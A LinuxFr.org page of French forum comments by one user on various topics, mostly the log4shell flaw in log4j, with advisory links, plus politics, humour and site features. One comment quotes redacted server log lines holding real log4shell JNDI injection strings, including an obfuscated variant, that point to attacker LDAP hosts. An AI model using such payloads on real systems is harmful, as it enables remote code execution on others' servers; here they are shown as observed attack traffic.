Benoît Sibaud a écrit 9300 commentaires

Et sans accès possible distant, log4shell perds beaucoup de sa dangerosité.

Si l'attaquant contrôle une machine du réseau local, c'est dangereux aussi (pour en infecter plein d'autres via la faille log4j). Mais bon il y avait déjà un gros problème au départ.

Notons aussi que les outils d'analyse de code statique ou dynamique, libres ou propriétaires, sur du source disponible ou du bytecode, aussi sophistiqués qu'ils soient, n'ont rien vu. Ni les précédents audit de sécurité, relectures, pentests, tests de fuzzing, etc. sur n'importe quel logiciel embarquant des versions vulnérables de log4j, que ce logiciel soit propriétaire ou non. Dit autrement on peut vouloir blâmer la maigre équipe log4j qui a pourtant réagi rapidement, mais personne n'a fait mieux, y compris chez les très gros éditeurs de logiciels ou les grands acteurs de la sécurité. Un peu comme si on blâmait juste l'équipe d'openssl utilisé tout le monde alors que personne n'avait rien vu venir non plus. Et que personne n'a d'inventaire exhaustif de son parc logiciel, que tout le monde a des logiciels n'ayant plus aucun support sécu, que les flux vers l'extérieur sont largement ouverts, sans parler du fait que les donneurs de conseil de maintenant et les colporteurs d'infos approximatives ou erronées sont les mêmes que ceux ayant fait ou non-fait les choix informatiques précédents. Bonnes fêtes de fin d'année aux équipes qui doivent continuer à pat cher.

"Autrefois" la Droite c'était les égoïstes conservateurs ambitieux cupides autoritaires et la Gauche les dispendieux dirigistes naïfs égalitaristes anti-tradition. Maintenant c'est surtout "cette personne n'est pas vraiment de droite elle est trop sociale", "celui-là n'est pas vraiment de gauche il est trop anti-social". Voire X condamné, Y en prison, Z à son 5e appel de sa 8e affaire, lui qui change de parti, etc. Les idées osef, les grands partis n'en produisent plus vraiment, au mieux on a des figures vitrines promettant tout et n'importe quoi, dans l'exagération et le buzz/clash. Du clivant à pas cher, intellectuellement parlant. Bref pas d'idées, moralisation/judiciarisation en cours (faut voir…), populisme, électorat désabusé ou abstentionnistes. (Pour le coup il doit y avoir plus de débats d'idées politiques sur linuxfr.org qu'à beaucoup d'autres endroits, non sans heurts).

Devenu hosts.txt8b, puis hosts.unicode, suivi de hosts.xml avant de migrer vers le plus simple hosts.json, supplanté par hosts yml, qui fût remplacé par hosts.i2bp, révolutionné par hosts.blockchain, sublimé par hosts.nft, transcendé par hosts.ia.ml. En 2032 lors de la Chute du Grand Tout, un fichier hosts.txt fût réinstallé pour les 42 machines et transhumanistes connectés restants, recréant un plus petit Internounet.

https://fr.wikipedia.org/wiki/Nutri-score fournit pas mal d'infos sur le calcul et les critiques actuelles (qui semblent majoritairement venir de l'industrie agroalimentaire, et marginalement des producteurs de roquefort).

Encore un souci de différence de rendu entre modération et publication… Corrigé, merci.

Pour ceux qui se poseraient la question MPICH is a high performance and widely portable implementation of the Message Passing Interface (MPI) standard. Rien à voir avec un MPICHment à l'états-unienne.

Et depuis il y a une nouvelle nouvelle version 2.17.0 https://logging.apache.org/log4j/2.x/ et https://issues.apache.org/jira/browse/LOG4J2-3230?jql=project%20%3D%20LOG4J2%20AND%20fixVersion%20%3D%202.17.0

Et depuis il y a une nouvelle nouvelle version 2.17.0 https://logging.apache.org/log4j/2.x/ et https://issues.apache.org/jira/browse/LOG4J2-3230?jql=project%20%3D%20LOG4J2%20AND%20fixVersion%20%3D%202.17.0

Si c'est la même info que le commentaire https://linuxfr.org/users/misc/liens/log4shell-rce-0-day-exploit-found-in-log4j-a-popular-java-logging-package#comment-1875994 qui date du 15 sur le lien précédent.

La discussion principale est sur https://linuxfr.org/users/misc/liens/log4shell-rce-0-day-exploit-found-in-log4j-a-popular-java-logging-package , sachant que tu avais déjà un autre lien https://linuxfr.org/users/spacefox/liens/logout4shell-corriger-la-faille-log4j-en-se-servant-de-la-faille-log4j . On voit la limite des liens : un petit côté fire and forget, soumis et oublié, par rapport à un contenu discuté dans le temps (l'info de ton lien était déjà dans les commentaires précédents).

Vu le sujet, ça reste cependant mieux d'avoir deux fois l'info que zéro.

https://twitter.com/eastdakota/status/1469800951351427073
Cloudflare: "Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure."

Et une liste de logiciels concernés ou non (pratique pour avoir les statuts) :

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

• une référence en français https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

• Debian https://www.debian.org/security/2021/dsa-5020 et https://security-tracker.debian.org/tracker/CVE-2021-44228
• Red Hat https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2021-44228
• Ubuntu https://ubuntu.com/security/CVE-2021-44228
• Suse https://www.suse.com/security/cve/CVE-2021-44228.html

• Mageia https://advisories.mageia.org/CVE-2021-44228.html
  …

• premier signalement à BlackHat 2016 https://twitter.censors.us/th3_protoCOL/status/1469644923028656130

• répondre à l'attaque par une bombe zip https://twitter.censors.us/shipilev/status/1469407591629524998

• débat sur le manque de financement / soutien aux mainteneurs de paquets largement utilisées https://twitter.censors.us/campuscodi/status/1469723936950730759 ou https://twitter.censors.us/bagder/status/1469761130503487492 ou https://twitter.censors.us/bert_hu_bert/status/1469772892980363267

• motif utilisé dans les adresses de courriel https://twitter.censors.us/lean0x2f/status/1469233245715849218

• motif utilisé dans les SSID https://twitter.censors.us/hackerfantastic/status/1469481775172829192

• attaque contre Minecraft https://twitter.censors.us/_JohnHammond/status/1469255402290401285

• attaque contre Tor https://twitter.censors.us/SwiftOnSecurity/status/1469453353822339073

Journal est utilisé ici dans le sens journal personnel, journal intime ou blog. Ils ne passent pas par la modération a priori. Et ils ne sont pas nécessairement hors-sujet (à vue de nez, la majorité est dans le thème, par contre les plus polémiques / pénibles sont hors sujets).

Attention, l'éthique et la légalité d'une telle action semblent douteuses. Voir par exemple https://twitter.censors.us/bortzmeyer/status/1469967302863040515#m

• Naissance du Facebouc du Libre
• La nouvelle licor^Wle nouveau poney à corne français
• interview IPoT : « j'ai gagné mon premier million avec un trombinoscope d'université, avant de lancer Immédiagram, OuatesApp, OccultusVR, et je ai renommé la maison mère en Profond et j'ai lancé Approfond mon monde virtuel »
• Bientôt Écoliers d'avant la déclinaison pour le marché seniors

45.155.205.<snip> - - [10/Dec/2021:14:14:08 +0100] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.<snip>:12344/Basic/Command/Base64/<snip>"
(...)
45.137.21.<snip> - - [11/Dec/2021:03:25:44 +0100] "POST / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.137.21.<snip>:1389/Basic/Command/Base64/<snip>"
(...)
20.71.156.<snip> - - [11/Dec/2021:05:51:53 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 178 "-" "Mozilla/5.0 zgrab/0.x"
(...)
45.153.160.<snip> - - [10/Dec/2021:18:59:19 +0100] "GET / HTTP/1.1" 301 162 "-" "${jndi:ldap://<snip>:39356/a}"
(...)
195.251.41.<snip> - - [11/Dec/2021:02:11:36 +0100] "GET /$%7Bjndi:ldap://45.130.229.<snip>:1389/Exploit%7D HTTP/1.1" 301 162 "-" "Mozilla/5.0 zgrab/0.x"
(...)
185.220.101.<snip> - - [11/Dec/2021:12:19:35 +0100] "GET / HTTP/1.1" 301 483 "-" "${jndi:ldap://205.185.115.<snip>:47324/a}"
(...)
137.184.106.<snip> - - [11/Dec/2021:10:38:44 +0100] "GET / HTTP/1.1" 200 8587 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://<snip>:80/callback}"

Russie RU-ITRESHENIYA, Bangladesh BD-ROOTLAYER-20190805, Microsoft, Singapour/Chypre, Pays-Bas Moneroj-VPS ou NFORCE_ENTERTAINMENT, Grèce EUGENIDES-GR, États-Unis DIGITALOCEAN-167-71-0-0, Australie APNIC-ERX-146-56-0-0, Brésil DIQUA12, Allemagne Tor-Exit, Chine ALISOFT… Cet appel au voyage et à la rêverie.

Attention, l'unité SI pour les températures est le kelvin et non le Kelvin :-). (source)

et d'autres infos via https://github.com/kdeldycke/awesome-falsehood#emails

rss2email est utilisé pour la lettre quotidienne du site (qui basiquement envoie les dépêches de la veille).

Corrigé, merci.

• clic sur le '#' du commentaire : https://linuxfr.org/users/booga/journaux/comptes-de-1999-qui-etes-vous#comment-1874691

ça ne fait que positionner dans la page, donc on voit le contenu et tous les commentaires

• clic sur le titre du commentaire : https://linuxfr.org/nodes/126120/comments/1874691

on ne voit ni le contenu (même pas un lien), ni les commentaires précédents.

• clic sur répondre au commentaire : https://linuxfr.org/nodes/126120/comments/1874691/answer#new_comment

on ne voit ni le contenu (mais on a un lien Retourner au contenu associé), ni les commentaires précédents.

• clic sur éditer le commentaire (partie réservée à la modération) : https://linuxfr.org/nodes/126120/comments/1874691/modifier

on ne voit ni le contenu (même pas un lien), ni les commentaires précédents.

Je trouve aberrant qu'on ne puisse pas avoir accès à l'intégralité du contenu que l'on commente et de la discussion qui y est liée. Et ça pose des problèmes : redites, énervements, etc. Je n'arrive même pas à comprendre comment on peut, a pu penser, concocter ça et trouver ce comportement satisfaisant. Ça me gêne énormément.

pas d'entrée de suivi me semble-t-il

Je trouve aussi curieux qu'on ne puisse pas changer son fusil d'épaule et modifier une note mal attribuée.

https://linuxfr.org/suivi/annuler-un-pertinentage-inutilage

Concernant les images, le fait que, pour les dépêches, il faille passer par un service externe ne me paraît pas pertinent (et en plus c'est dangereux caar on ne peut pas les contrôler, cela peut pousser des gens à ne pas faire de dépêche et c'est contraire aux bonnes pratiques).

https://linuxfr.org/suivi/heberger-les-images-des-news-et-eventuellement-journal

Et, évidemment, il manque les boutons de signalement pour spam, et autre.

https://linuxfr.org/suivi/ajouter-un-bouton-signaler-un-truc